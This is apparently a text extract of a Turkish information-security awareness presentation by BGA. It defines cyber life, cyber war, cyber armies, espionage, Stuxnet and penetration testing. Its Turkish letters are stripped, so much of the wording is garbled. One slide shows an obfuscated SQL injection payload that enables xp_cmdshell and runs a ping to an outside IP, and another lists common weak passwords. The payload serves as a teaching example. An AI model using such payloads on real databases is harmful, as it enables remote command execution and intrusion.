Professional Documents
Culture Documents
Gvenliini Sala
Teknolojiyi Al
Teknolojiyi Kullan
Teknolojiyi ren
Obamadan nciler...
So cyberspace is real. And so are the risks that come with it. In short, America's economic prosperity in the 21st century will depend on cybersecurity. it's now clear this cyber threat is one of the most serious economic and national security challenges we face as a nation. And finally, we will begin a national campaign to promote cybersecurity awareness
Siber Hayat
Siber tanm: Altyaps biliim sistemleri olan ve gerek hayatn glgesi niteliindeki yaam. Alveri, oyun, film, mzik, ticaret, yemek, komuluk, istihbar bilgi toplama vs gibi gerek hayatn vazgeilmez ileri siber hayatta da benzeri isimlerle yer almaktadr. Halk iinde sanal dnya olarak da bilinir.
Siber Gvenlik
Siber hayatn gvenlii(gizlilik, btnlk ve eriilebilirlik) salanmas amacyla gerekletirilen faaliyetlerin tm. Bilgi gvenliinden fark: daha soyut ve geni bir alan kapsamas
Bilgi gvenlii teknik, siber gvenlik sosyal bir tanmdr.
Gncel Durum
Siber hayat kavramnn yerlemesi. Siber gvenlik, siber sava, siber ordu tanmlarnn konuulmaya balanmas. Yerli gvenlik yazlmlarnn gelitirilmeye balanmas(yerli retim %0,1 seviyelerinde) Temel eksiklik: bilgi gvenlii farkndal, teknik konularda alanlarn temel bilgi eksiklii. Siber gvenliin lks deil, gereksinim olduu fikrinin yaygnlamas. Siber Gvenlik Dernei kurulumu.(2011)
Siber Tehditler
Bilgi gvenliini ihlal edecek tm faaliyetler
DDoS saldrlar: internet zerinden sistemlerin eriilebilir olmasn engelleme Hacking aktiviteleri
Bilgi szdrma faaliyetleri
RSA Sony PS a yelerinin bilgilerinin szmas
Siber Sava
Biliim sistemleri kullanlarak gerekletirilen ve amac bir irkete, bir lkeye veya bir gruba ynelik maddi, manevi zararlar verme olan faaliyetler. 2007 Estonya rnei:
DDoS saldrlaryla lkenin internet sisteminin ilemez hale getirilmesi
Siber Ordu
lkeyi, kurumu siber dnyadan gelebilecek tehlikelere kar koruyacak ve gerektiinde siber saldrlar gerekletirebilecek yetenekteki bilgi gvenlii uzmanlarnn Siber ordu mensubu tm askerler hem saldr hem de koruma yntemlerini ok iyi bilmek zorundadrlar . ki tr siber ordu bulunmaktadr:
Devlet eliyle yetitirilen resmi birimler Gnll fakat resmi aya olmayan birimler
Cyber spying
eitli hacking yntemleri kullanlarak hedef irket/kurum/devletten bilgi szdrmak
zellikle istihbarat tekilatlarnn sk bavurduu yntemlerden biridir. stihbarat tekilatlar gvenlik sistemlerine yakalanmayacak malware, virs gelitirme konusunda ciddi yatrmlar gerekletirmektedir. Bunun en iyi rnei randa yaanan Stuxnet ad verilen ve dorudan SCADA sistemlere ynelik aksiyon alan ktcl yazlmdr.
Cyber weapon
Klasik dnyadaki silah kavramndan farkl olarak siber silah sadece yoketme amac tamamaktadr. Yeri geldiinde yoketme, yeri geldiinde iz silme ve yeri geldiinde hedef sistemlerden bilgi karma amal kullanlacak yntem ve aralardr. Stuxnet en gncel ve ideal siber silah rneidir.
Siber Casus
Siber casuslar siber ordu elemanlardr En az 3 yl sren zel eitimlerden geirilerek bilgi gvenliine ait tm konular bilen ve 3 konuda ileri seviye uzman olan kiilere verilen lakaptr. Bu kiilerin grevleri biliim sistemlerini kullanarak bilgi szdrmaktr. Grevleri genellikle teknoloji irketlerinde bilgisayarla ilgili herhangi bir alandr
Penetration test
Sistemlerin gvenliini test ettirmek amacyla gerekletirilen ve hackerlarn kullandklar yntemleri kullanan beyaz apkallarn gzyle sistem aklklarnn aranmas
Whitebox pentest Blackbox pentest Olmak zere temelde ikiye ayrlr. Ciddi teknik altyap gerektiren bir prosestir.
II. Blm
Bilgi Gvenlii AKADEMS | www.bga.com.tr
23
Trkiyeye zel deil tm dnya iin geerli Teknik sorunlar teknik yollarla zlr, insani sorunlar insanla zlr Temel bilgi sahibi olmadan ileri seviye iler yapmaya alma
TCP/IP bilmeden Firewall/IPS ynetmek
Bilgi Gvenlii AKADEMS | www.bga.com.tr
24
Uygulama Gvenlii
Yazlm Gelitirme
IT Gvenlik
25
Hacking Stage 6
Wikipedia, Feb 9 2007
26
27
Firewall
IDS/IPS
WAF
Hackerlarin Gidiat
Client inSecurity
Mobile inSecurity
Social Networks/Eng.
Bak As
34
35
var=1';DECLARE @a varchar(200) DECLARE @b varchar(200) DECLARE @c varchar(200) SET @a = REVERSE ('1 ,"snoitpo decnavda wohs" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @b = REVERSE ('1,"llehsdmc_px" erugifnoc_ps.obd.retsam') EXEC (@a) RECONFIGURE SET @c =REVERSE('08.911.39.19 gnip" llehsdmc_px') EXEC (@c);- REVERSE('08.911.39.19 gnip" llehsdmc_px')= ping 91.93.119.80
Bilgi Gvenlii AKADEMS | www.bga.com.tr
36
Parola Profilimiz
123456 123456789 0 111111 123123 14531453 1234567 123654 19861986 12345678 666666
cretsiz ye olabilirsiniz. Gvenlik dnyasnda yaynlanan nemli haberler, gvenlik yamalar ve birok teknik konuda tartma... yelik iin
http://www.lifeoverip.net/netsec-listesi/
Bilgi Gvenlii AKADEMS | www.bga.com.tr
38
Sorular?
39
40